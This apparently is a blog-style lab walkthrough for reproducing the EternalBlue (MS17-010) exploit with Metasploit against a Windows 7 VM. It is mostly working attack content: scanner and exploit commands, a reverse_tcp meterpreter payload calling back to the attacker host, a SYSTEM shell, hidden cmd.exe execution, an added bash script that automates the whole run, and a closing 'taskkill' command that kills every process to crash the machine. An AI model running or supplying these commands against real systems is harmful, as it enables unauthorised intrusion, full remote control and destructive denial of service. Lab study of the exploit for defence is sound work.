Reproducing EternalBlue (MS17-010)

Tools and environment

  • Hypervisor
    • VMware-workstation-full-16.0.0-16894299
  • Virtual machines
    • kali-linux-2020.3-vmware-amd64 (attacker)
      ip: 172.20.10.6
    • cn_windows_7_enterprise_with_sp1_x64_dvd_u_677685 (target)
      ip: 172.20.10.7

Both guests sit on the same host-only/NAT network. The msfconsole output later in this post uses this layout: RHOSTS 172.20.10.7 is the Windows 7 target and LHOST 172.20.10.6 is the Kali listener.

The target VM image will be posted to the download site later.

1. Check that the two hosts can reach each other (from Kali: ping -c 3 172.20.10.7). If Windows Firewall drops ICMP echo, a ping failure is not conclusive; what the exploit actually needs is SMB on TCP/445, so confirm that port is open instead.

2. Start Metasploit

msfconsole

Check the database connection:

db_status

This output means the database is connected:

msf > db_status
[*] postgresql connected to msf

Search for the MS17-010 modules:

search ms17_010
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Interact with a module by name or index, for example use 4 or use exploit/windows/smb/ms17_010_psexec

Scan

(Can be skipped if the target is already known to be vulnerable. The scanner module only queries the SMB service to decide whether the host is unpatched; unlike the exploit it does not touch the kernel pool, so it is the safe way to confirm a target first.)

use auxiliary/scanner/smb/smb_ms17_010

Set the options:

set rhosts <target ip>
set threads 20
run

Exploit

use exploit/windows/smb/ms17_010_eternalblue

Set the options (rhost is accepted as an alias for RHOSTS, which is the name show options prints):

set rhost <target ip>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <attacker ip>

Review the settings:

show options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.20.10.7      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.6      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Only the options set above need checking here: RHOSTS, the payload and LHOST (LPORT stays at 4444 unless something else on Kali is listening there). Leave VERIFY_ARCH and VERIFY_TARGET at true; they make the module abort instead of firing a kernel-pool groom built for x64 Windows 7 / Server 2008 R2 against a different build.

Launch the exploit:

run
or
exploit

The module corrupts the SMB kernel pool, so a failed attempt can blue-screen the target. If the first run ends without a session, make sure the target came back up cleanly and then try again; a second attempt often lands.

WIN in the output means the exploit succeeded:

[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The console prompt changes to:

meterpreter >

Get a Windows command shell on the target with either of the following (the session runs as NT AUTHORITY\SYSTEM, which getuid in meterpreter will confirm):

meterpreter > shell
C:\Windows\system32 >
or:
meterpreter > execute  -H -i -f cmd.exe
C:\Windows\system32 >

In the second form -f names the program to run, -i attaches the meterpreter channel to it, and -H starts it hidden so no window appears on the target desktop.
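The whole sequence above (reachability check, scanner, exploit, review) as one script. This is an added example, not code from the original post: it wraps the interactive msfconsole steps in a bash preflight check and a Metasploit resource script that msfconsole -r replays. The addresses are the assumed lab layout (target 172.20.10.7, attacker 172.20.10.6) and the output path /tmp/ms17_010.rc is an arbitrary choice; replace both with your own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: the interactive msfconsole steps
# (scan, exploit, review) wrapped in a preflight check and a resource script.
# Assumed lab layout: target 172.20.10.7, attacker 172.20.10.6.

# preflight TARGET
# EternalBlue needs SMB on TCP/445, so confirm the host answers and that the
# port accepts a connection before spending time in msfconsole. A ping failure
# alone is not fatal because Windows Firewall may drop ICMP echo.
preflight() {
  local target="$1"
  if ! ping -c 2 -W 2 "$target" >/dev/null 2>&1; then
    echo "[-] $target does not answer ping (firewall may drop ICMP); checking the port anyway"
  fi
  # bash /dev/tcp connect with a 3-second timeout; no dependency on nmap or nc
  if timeout 3 bash -c "exec 3<>/dev/tcp/$target/445" 2>/dev/null; then
    echo "[+] $target: TCP/445 open"
    return 0
  fi
  echo "[-] $target: TCP/445 closed or filtered"
  return 1
}

# write_rc TARGET LHOST LPORT OUTFILE
# Emit a resource script reproducing the manual sequence: database check,
# MS17-010 scanner, then ms17_010_eternalblue with an x64 reverse_tcp
# meterpreter. "check" runs the module's own vulnerability test before any
# kernel-pool corruption is attempted; "exploit -z" backgrounds the session.
write_rc() {
  local target="$1" lhost="$2" lport="${3:-4444}" out="$4"
  cat >"$out" <<EOF
db_status
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $target
set THREADS 20
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
check
exploit -z
EOF
  printf '%s\n' "$out"
}

# main TARGET LHOST [RCFILE]: preflight, write the script, hand it to msfconsole.
main() {
  local rc="${3:-/tmp/ms17_010.rc}"
  preflight "$1" || exit 1
  write_rc "$1" "$2" 4444 "$rc" >/dev/null
  msfconsole -q -r "$rc"
}

# Only runs when invoked with addresses, e.g.:  ./ms17_010.sh 172.20.10.7 172.20.10.6
if [ "$#" -ge 2 ]; then main "$@"; fi
```

After msfconsole finishes the resource file you are left at the msf prompt with the session in the background; sessions -i 1 attaches to it and the shell / execute steps above apply unchanged. The resource script is plain text, so diff it against show options when a run behaves unexpectedly.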

Blue-screen command

Run from the shell obtained above. Windows has no process with PID 1, so the filter "pid ne 1" matches every process, and /f force-terminates all of them, including critical system processes such as csrss.exe and wininit.exe; Windows bugchecks as soon as one of those dies. This is purely destructive: use it only on the lab VM, and take a snapshot first.

taskkill /f /fi "pid ne 1"

kamuXiY